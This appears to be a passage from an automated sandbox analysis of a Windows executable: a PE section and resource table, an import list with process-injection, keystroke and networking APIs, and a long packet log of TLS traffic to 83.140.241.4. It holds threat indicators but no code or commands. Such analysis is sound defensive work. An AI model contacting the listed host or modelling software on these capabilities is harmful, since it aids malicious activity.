                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000xb33280xb3400507a8505198e35cc9675301d53e3b1c4False0.5503358721234309data6.5212967575920215IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0xb50000x342040x344009eda36be0cf076085a2f9772c1ee5803False0.30884139503588515data5.360588077813426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xea0000x91200x5000ec6b77d6ef8898b0d3b7d48c042d66a0False0.040673828125DOS executable (block device driver)0.5749243362866429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .pdata0xf40000x6f480x70004416e27f8be9f9271c439d2fd34d1b2dFalse0.49612862723214285data5.911479421450324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .rsrc0xfb0000xf7d5f0xf7e00ceb6bcaf6eba18deca9c692827bf05ddFalse0.9149253025718608data7.848959409713496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x1f30000xa740xc005ddb0e422ace102fe530e589a0cbec6fFalse0.4850260416666667data5.139847116863034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          AVI0xfb5d00x3a00RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.4548760775862069
                                                                          SVG0xfefd00x46dSVG Scalable Vector Graphics imageEnglishUnited States0.3909973521624007
                                                                          RT_ICON0xff4400x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                          RT_ICON0xff5680x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                          RT_ICON0xff6900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/mEnglishGreat Britain0.7730496453900709
                                                                          RT_ICON0xffaf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/mEnglishGreat Britain0.6629924953095685
                                                                          RT_ICON0x100ba00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/mEnglishGreat Britain0.578734439834025
                                                                          RT_ICON0x1031480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/mEnglishGreat Britain0.5426901275389703
                                                                          RT_ICON0x1073700x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/mEnglishGreat Britain0.42431681059978704
                                                                          RT_ICON0x117b980xd90dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.000467920453523
                                                                          RT_MENU0x1254a80x1856dataEnglishUnited States0.365008025682183
                                                                          RT_MENU0x126d000x15f4dataEnglishUnited States0.36850533807829183
                                                                          RT_MENU0x1282f40x1ff0dataEnglishUnited States0.2844911937377691
                                                                          RT_MENU0x12a2e40x50dataEnglishGreat Britain0.9
                                                                          RT_STRING0x12a3340x594dataEnglishGreat Britain0.3333333333333333
                                                                          RT_STRING0x12a8c80x68adataEnglishGreat Britain0.2735961768219833
                                                                          RT_STRING0x12af540x490dataEnglishGreat Britain0.3715753424657534
                                                                          RT_STRING0x12b3e40x5fcdataEnglishGreat Britain0.3087467362924282
                                                                          RT_STRING0x12b9e00x65cdataEnglishGreat Britain0.34336609336609336
                                                                          RT_STRING0x12c03c0x466dataEnglishGreat Britain0.3605683836589698
                                                                          RT_STRING0x12c4a40x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                          RT_RCDATA0x12c5fc0xc62f0data1.0003153641470386
                                                                          RT_GROUP_ICON0x1f28ec0x5adataEnglishGreat Britain0.7888888888888889
                                                                          RT_GROUP_ICON0x1f29480x14dataEnglishGreat Britain1.25
                                                                          RT_GROUP_ICON0x1f295c0x14dataEnglishGreat Britain1.15
                                                                          RT_MANIFEST0x1f29700x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                          DLLImport
                                                                          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                          UxTheme.dllIsThemeActive
                                                                          KERNEL32.dllWaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext
                                                                          USER32.dllGetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW
                                                                          GDI32.dllEndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath
                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW
                                                                          SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                          OLEAUT32.dllVariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States
                                                                          EnglishGreat Britain
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 8, 2024 14:12:01.113811970 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:01.113867044 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:01.113944054 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:01.126435041 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:01.126451969 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:01.944242001 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:01.944397926 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:01.949330091 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:01.949347019 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:01.949686050 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:01.962946892 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.007407904 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.653601885 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.653631926 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.653647900 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.653773069 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.653806925 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.653858900 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.663743973 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.663763046 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.663847923 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.663856983 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.663901091 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.668504000 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.668519020 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.668606997 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.668615103 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.668649912 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.672271967 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.672286987 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.672384977 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.672393084 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.672436953 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.674415112 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.674429893 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.674508095 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.674515009 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.674557924 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.675575972 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.676232100 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.676246881 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.676322937 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.676328897 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.676373005 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.678080082 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.678095102 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.678136110 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.678143024 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.678172112 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.678179979 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.680706978 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.680721045 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.680782080 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.680788994 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.680821896 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.680830956 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.682821035 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.682836056 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.682909012 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.682918072 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.682960033 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.684684992 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.684701920 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.684767962 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.684772968 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.684814930 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.685878038 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.685893059 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.685956955 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.685962915 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.686000109 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.687549114 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.687563896 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.687613010 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.687619925 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.687647104 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.687663078 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.709363937 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.709379911 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.709455967 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.709464073 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.709503889 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.729186058 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.729199886 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.729262114 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.729269981 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.729309082 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.730535984 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.730551004 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.730609894 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.730617046 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.730655909 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.732112885 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.732131958 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.732187033 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.732193947 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.732228994 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.733386993 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.733400106 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.733444929 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.733450890 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.733474970 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.733486891 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.735075951 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.735089064 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.735133886 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.735140085 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.735177040 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.736983061 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.736994982 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.737055063 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.737059116 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.737097979 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.738003016 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.738015890 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.738066912 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.738073111 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.738095045 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.738104105 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.797092915 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.797108889 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.797174931 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.797205925 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.797250032 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.816586971 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.816615105 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.816654921 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.816663980 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.816711903 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.816724062 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.817926884 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.817950964 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.818001986 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.818006992 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.818046093 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.819364071 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.819391966 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.819426060 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.819432020 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.819442034 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.819472075 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.819750071 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.820688963 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.820703983 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.820759058 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.820763111 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.820791006 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.820802927 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.822179079 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.822194099 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.822259903 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.822264910 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.822304010 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.823266983 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.823288918 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.823339939 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.823344946 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:02.823385000 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:02.874562025 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.230978966 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.231004953 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.231101036 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.231129885 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.231143951 CEST49730443192.168.2.483.140.241.4
